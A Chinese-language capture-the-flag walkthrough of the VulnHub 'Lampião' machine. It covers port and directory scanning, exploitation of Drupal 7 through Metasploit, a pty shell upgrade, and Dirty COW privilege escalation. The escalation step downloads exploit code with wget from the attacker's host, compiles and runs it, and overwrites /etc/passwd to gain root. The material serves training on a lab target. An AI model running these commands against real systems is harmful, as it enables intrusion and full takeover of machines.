靶机下载:https://download.vulnhub.com/lampiao/Lampiao.zip
信息收集
[email protected]:~# nmap -sS -p- 10.10.10.128 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 09:21 EDT Nmap scan report for 10.10.10.128 Host is up (0.0014s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1898/tcp open cymtec-port 7 (VMware)MAC Address: 00:0C:29:F1:26:4 Nmap done: 1 IP address (1 host up) scanned in 7.26 seconds
[email protected]:~# nmap -p 22,80,1898 -A --version-all -T 5 10.10.10.128 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 09:23 EDT Nmap scan report for 10.10.10.128 Host is up (0.00060s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA) | 2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA) | 256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA) |_ 256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519) 80/tcp open http? | fingerprint-strings: | NULL: | _____ _ _ | |_|/ ___ ___ __ _ ___ _ _ | x20| __/ (_| __ x20|_| |_ | ___/ __| |___/ ___|__,_|___/__, ( ) | |___/ | ______ _ _ _ | ___(_) | | | | | x20/ _` | / _ / _` | | | |/ _` | | |_ __,_|__,_|_| |_| 1898/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: LampixC3xA3o 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.80%I=9%D=6/10%Time=5EE0DEB6%P=x86_64-pc-linux-gnu%r(NULL SF:,1179,"x20_____x20_x20x20x20_x20x20x20x20x20x20x20x20x20 SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x2 SF:0x20x20x20x20x20x20x20x20x20n|_x20x20x20_|x20|x20(x SF:20)x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x2 SF:0x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20nx20x20|x20|x20|x20|_|/x20___x20x20x20x20___x20x20 SF:__x20_x20___x20_x20x20x20_x20x20x20x20x20x20x20x20x20x2 SF:0x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20n SF:x20x20|x20|x20|x20__|x20/x20__|x20x20/x20_x20/x20_` SF:x20/x20__|x20|x20|x20|x20x20x20x20x20x20x20x20x20x20 SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20nx20_ SF:|x20|_|x20|_x20x20__x20x20|x20x20__/x20(_|x20__x SF:20x20|_|x20|_x20x20x20x20x20x20x20x20x20x20x20x20x2 SF:0x20x20x20x20x20x20x20x20x20x20x20x20nx20___/x20__| SF:x20|___/x20x20___|__,_|___/__,x20(x20)x20x20x20x20 SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20x20nx20x20x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20x20__/x20|/x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20x20x20x20x20x20x20x20x20x20x20x20nx20x20x20x20x20x SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20x20x20x20x20x20x20x20x20x20x20|___/x20x20x20x20x20x SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20x20x20x20n______x20_x20x20x20x20x20x20x20_x20x20x20x SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20x20x20x20x20x20x20x20x20_x20n|x20x20___(_)x20x20x SF:20x20x20|x20|x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20 SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20|x20|n SF:|x20|_x20x20x20_x20x20x20x20__|x20|_x20x20x20_x20_x20_ SF:_x20___x20x20x20__x20_x20x20x20x20___x20x20__x20_x20_x20 SF:x20x20_x20x20__x20_|x20|n|x20x20_|x20|x20|x20x20/x20 SF:_`x20|x20|x20|x20|x20'_x20`x20_x20x20/x20_`x20|x20x SF:20/x20_x20/x20_`x20|x20|x20|x20|/x20_`x20|x20|n|x2 SF:0|x20x20x20|x20|x20|x20(_|x20|x20|_|x20|x20|x20| SF:x20|x20|x20|x20(_|x20|x20|x20x20__/x20(_|x20|x20| SF:_|x20|x20(_|x20|_|n_|x20x20x20|_|x20x20__,_|__ SF:,_|_|x20|_|"); MAC Address: 00:0C:29:F1:26:47 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.60 ms 10.10.10.128 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 30.20 seconds80端口其实没有啥东西,扫目录啥都扫不到,只有个静态页面。主要的web服务在1898端口。
扫描1898端口:
80端口其实没有啥东西,扫目录啥都扫不到,只有个静态页面。主要的web服务在1898端口。
扫描1898端口:
[email protected]:~# dirb http://10.10.10.128:1898 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed Jun 10 09:25:07 2020 URL_BASE: http://10.10.10.128:1898/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.128:1898/ ---- ==> DIRECTORY: http://10.10.10.128:1898/includes/ + http://10.10.10.128:1898/index.php (CODE:200|SIZE:11400) ==> DIRECTORY: http://10.10.10.128:1898/misc/ ==> DIRECTORY: http://10.10.10.128:1898/modules/ ==> DIRECTORY: http://10.10.10.128:1898/profiles/ + http://10.10.10.128:1898/robots.txt (CODE:200|SIZE:2189) ==> DIRECTORY: http://10.10.10.128:1898/scripts/ + http://10.10.10.128:1898/server-status (CODE:403|SIZE:294) ==> DIRECTORY: http://10.10.10.128:1898/sites/ ==> DIRECTORY: http://10.10.10.128:1898/themes/ + http://10.10.10.128:1898/web.config (CODE:200|SIZE:2200) + http://10.10.10.128:1898/xmlrpc.php (CODE:200|SIZE:42) ---- Entering directory: http://10.10.10.128:1898/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.128:1898/misc/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.128:1898/modules/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.128:1898/profiles/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.128:1898/scripts/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.128:1898/sites/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.128:1898/themes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Wed Jun 10 09:25:12 2020 DOWNLOADED: 4612 - FOUND: 5
可以挨个打开看看,然后找到这样一个minimal.info文件在http://10.10.10.128:1898/profiles/,这里面包含了webCMS的版本信息。
我们可以搜索一下有没有对应的漏洞
searchsploit Drupal
漏洞还挺多,我们可以进MSF中尝试利用,MSF中可以找到不少利用模块,图中标注的可以直接getshell
配置参数如下:
此时我们拿到了www-data的权限。下一步就是需要提权。
提权
我们首先将拿到的shell提升成全交互式的shell,提升shell的方法有很多,这里有个国外大佬的link,可以参考下
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
我这里用的是这条命令:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
提升完成之后更方便我们操作,这里提供一个Linux 提权脚本,这个脚本可以自动检测可以用于当前环境的提权漏洞
https://github.com/mzet-/linux-exploit-suggester
最后找到了这个提权漏洞
https://www.exploit-db.com/exploits/40847
首先将漏洞代码下载到目标靶机:
wget http://10.10.10.131/40847.cpp --2020-06-10 14:44:02-- http://10.10.10.131/40847.cpp Connecting to 10.10.10.131:80... connected. HTTP request sent, awaiting response... 200 OK Length: 10531 (10K) [text/x-c++src] Saving to: '40847.cpp' 0K .......... 100% 74.9M=0s 2020-06-10 14:44:02 (74.9 MB/s) - '40847.cpp' saved [10531/10531]
然后编译提权
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil ls 40847.cpp 40871.c 44298.c dcow exp expoit les.sh ./dcow -s Running ... Password overridden to: dirtyCowFun Received su prompt (Password: ) Error getting terminal attributes. terminate called after throwing an instance of 'std::exception*' Aborted (core dumped) id uid=33(www-data) gid=33(www-data) groups=33(www-data) python -c 'import pty; pty.spawn("/bin/bash")' [email protected]:/tmp$ ls ls 40847.cpp 40871.c 44298.c dcow exp expoit les.sh [email protected]:/tmp$ ./dcow -s ./dcow -s Running ... Password overridden to: dirtyCowFun Received su prompt (Password: ) echo 0 > /proc/sys/vm/dirty_writeback_centisecs cp /tmp/.ssh_bak /etc/passwd rm /tmp/.ssh_bak [email protected]:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs [email protected]:~# cp /tmp/.ssh_bak /etc/passwd [email protected]:~# rm /tmp/.ssh_bak [email protected]:~# id id uid=0(root) gid=0(root) groups=0(root)
在每个提权脚本的前几行都会有怎么编译,需要关注哪些内容,可以多看看脚本的前几行,一般用注释会有写出来。
拿到root权限之后,我们可以找到最后的flag.txt
[email protected]:~# cat flag.txt cat flag.txt 9740616875908d91ddcdaa8aea3af366
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册